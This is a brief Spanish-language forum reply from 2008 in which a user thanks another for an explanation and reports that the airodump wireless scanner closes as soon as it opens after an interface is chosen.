« Respuesta #6 en: 21-09-2008, 21:21 (Domingo) »
ja ja ja ok
muchas gracias  ;D

tienes toda la razon, y nuevamente gracias por la detallada explicacion, ya lo he modificado y si ahora me salen todas las interfaces, pero despues de escoger la interfaz le doy la opcion # 1 osea escanear y se habre y se cierra el airodump inmediatamente, voy a usar el buscador haber si encuentro una solucion y lo comento.
« Última modificación: 21-09-2008, 21:55 (Domingo) por dexter back »